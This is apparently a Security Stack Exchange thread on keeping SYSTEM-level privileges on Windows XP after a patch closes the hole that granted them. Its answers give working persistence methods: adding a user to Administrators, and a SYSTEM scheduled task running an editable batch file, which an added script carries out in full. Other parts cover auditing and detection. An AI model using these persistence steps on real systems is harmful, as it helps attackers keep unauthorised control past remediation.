1

Is it possible, in Windows XP, to maintain user privileges of a command shell after a reboot?

For example, I'm running as a non-privileged account LocalMachine\Pete, but have a shell running as LocalMachine\System. I want to maintain the privileges of that system shell after a reboot. In Linux this could be accomplished by creating a file that runs under that user. Is there a Windows equivalent?

Rory Alsop
Petey B
  • I'm having trouble imagining your scenario, because my first response would be "use whatever method you used to get the priv shell in the first place". – schroeder May 03 '12 at 21:22
  • @schroeder, This is because the method to get the privileged shell in the first place is scheduled to be patched, and I'm wondering if users who have exploited this could possibly maintain that privilege after patching. – Petey B May 04 '12 at 17:23

3 Answers

1

From the priv shell:

net localgroup Administrators pete /add

This adds pete to the admin local group, which means he has priv access after boot.

It's not limited to the shell, and would be detected in an audit.

But, as I said, if you got a priv shell in the first place, then rinse-repeat?

schroeder
  • Yeah this was the only thing I could find as well. Will leave the question open for a bit to see if anyone has other suggestions, but will accept it if not. Thanks. – Petey B May 04 '12 at 17:24
  • There are other options once someone has priv access. They could have installed back doors, root kits, grabbed the SAM database and cracked the local admin password. I'd be changing admin passwords, scanning for installs, and doing a full audit on the machine. If any blip shows up, I'd rebuild the machine. – schroeder May 05 '12 at 16:25
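Added example, not part of schroeder's answer: the `net localgroup Administrators pete /add` step above is exactly the kind of change "detected in an audit" means. The batch script below is that audit, written for the XP-era cmd.exe: run it once with `baseline` from a known-good state, then with `check` after the patch (or on a schedule) and it flags any member added to or removed from the local Administrators group. The baseline path, the temp file and the reliance on the English `net` output are assumptions made for the example.

```batch
@echo off
REM audit_admins.bat -- added example, not from the original answer.
REM   audit_admins.bat baseline   record the current local Administrators membership
REM   audit_admins.bat check      compare live membership against the recorded baseline
REM Assumptions: the baseline lives under %SystemRoot% (writable only by admins/SYSTEM on XP,
REM so a non-admin cannot quietly edit it), and "net localgroup" prints its English output.
setlocal
set BASELINE=%SystemRoot%\admins.baseline
set CURRENT=%TEMP%\admins.current

if /i "%~1"=="baseline" goto baseline
if /i "%~1"=="check" goto check
echo usage: %~nx0 baseline ^| check
exit /b 2

:baseline
call :dump "%BASELINE%"
echo Baseline written to "%BASELINE%":
type "%BASELINE%"
exit /b 0

:check
if not exist "%BASELINE%" (
    echo No baseline at "%BASELINE%"; run "%~nx0 baseline" first.
    exit /b 2
)
call :dump "%CURRENT%"
REM fc returns errorlevel 0 when the files match and 1 when they differ.
fc /L "%BASELINE%" "%CURRENT%" >nul
if errorlevel 1 (
    echo ALERT: local Administrators membership differs from baseline:
    fc /L "%BASELINE%" "%CURRENT%"
    exit /b 1
)
echo OK: Administrators membership unchanged.
exit /b 0

:dump
REM Writes the sorted member list to the file named in %1.
REM "net localgroup Administrators" prints a header, a line of dashes, one member per
REM line, then "The command completed successfully." Only the member lines are kept.
setlocal enabledelayedexpansion
set INLIST=0
(for /f "delims=" %%L in ('net localgroup Administrators') do (
    set "LINE=%%L"
    if "!LINE:~0,3!"=="---" (
        set INLIST=1
    ) else if "!LINE:completed successfully=!"=="!LINE!" (
        if !INLIST!==1 echo !LINE!
    )
)) > "%~1.tmp"
sort "%~1.tmp" > "%~1"
del "%~1.tmp"
endlocal
goto :eof
```

With "Audit account management" enabled in Local Security Policy, XP also writes Security event 636 (Security Enabled Local Group Member Added) at the moment of the `/add`, which dates the change in a way the file comparison cannot; the script is the fallback for boxes where that auditing was never turned on.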
1

Use a scheduled task to run a batch file. It will run in non-interactive mode (won't display a window) since you aren't entering a password - but should be able to launch an ssh daemon or something similar that gives you a command prompt.

The syntax at the command line is:

schtasks.exe /create /tn <name> /tr test.bat /sc minute /mo 1 /np /rl highest /ru system

That will create a scheduled job running test.bat (which you'd create somewhere in your path, like the windows directory) as SYSTEM that runs every minute. "schtasks.exe /create /?" will give you the full syntax, including options to only run it on start or logon. Running every minute though lets you edit your batch file several times to run multiple commands.

As long as you still have editing permissions to test.bat, you can make it run whatever commands you want.

Grant
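As an added example (not a script from Grant's answer), the batch file below carries the procedure above through end to end: it writes the payload, registers it as a task running as SYSTEM, and then runs the checks a reviewer or investigator would use to find it. The task name, the payload path and the proof file are arbitrary choices for the example; the remark about `/rl` is an assumption to verify on the box.

```batch
@echo off
REM persist_task.bat -- added example of the schtasks approach above; not Grant's own script.
REM Run it from the existing privileged shell: registering a task that runs as SYSTEM needs admin rights.
REM The task name, payload path and proof file are arbitrary choices for this example.
setlocal
set TASKNAME=SysCheck
set SCRIPT=%SystemRoot%\test.bat
set PROOF=%SystemRoot%\task_proof.txt

REM 1. Write the payload. The task re-runs this file every minute, so whatever is put in it
REM    later runs as SYSTEM on the next tick, including after a reboot. The payload appends
REM    the account it runs as to a file under %SystemRoot%, a directory a non-admin XP user
REM    cannot write to, so the proof file existing at all demonstrates the privilege.
> "%SCRIPT%" (
    echo @echo off
    echo echo %%DATE%% %%TIME%% running as %%USERNAME%% ^>^> "%PROOF%"
)

REM 2. Register the task: every minute (/sc minute /mo 1), as LocalSystem (/ru system).
REM    SYSTEM has no password, so none is supplied. The "/rl highest" switch in the answer is
REM    a Task Scheduler 2.0 (Vista and later) option; assumption: the XP schtasks rejects it,
REM    so check "schtasks /create /?" on the box before adding it.
schtasks /create /tn "%TASKNAME%" /tr "%SCRIPT%" /sc minute /mo 1 /ru system

REM 3. What a reviewer sees: the verbose query lists the account every task runs as.
schtasks /query /fo LIST /v | findstr /i /c:"TaskName" /c:"Task To Run" /c:"Run As User"

REM 4. Artifacts an investigator checks on XP (both writable only by admins/SYSTEM):
REM      %SystemRoot%\Tasks\*.job     one .job file per registered task
REM      %SystemRoot%\SchedLgU.txt    Task Scheduler's own log of each run
dir /b "%SystemRoot%\Tasks\*.job"
findstr /i /c:"%TASKNAME%" "%SystemRoot%\SchedLgU.txt"

REM 5. After one scheduler tick, read the proof file; the account name should be SYSTEM
REM    (some configurations show COMPUTERNAME$ instead):
REM    type "%PROOF%"

REM Cleanup when finished:
REM    schtasks /delete /tn "%TASKNAME%" /f
REM    del "%SCRIPT%" "%PROOF%"
endlocal
```

Step 3 and step 4 are the point for the defender: a task whose "Run As User" is SYSTEM and whose "Task To Run" is a batch file in a writable location is the same shape whether it was left by an administrator or by someone who had a SYSTEM shell before the patch, and the .job file and SchedLgU.txt survive the patch that closes the original hole.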
0

You could set up a scheduled task (Control Panel / Scheduled Tasks) to open the shell, set to occur "When I log on", with whatever user you want it to run as. You'll provide the credentials when setting up the task.

Doug Kavendek
  • Scheduled Tasks require a password when set up, I'm assuming I don't have the password. (I do, but for the sake of the scenario) – Petey B May 03 '12 at 17:45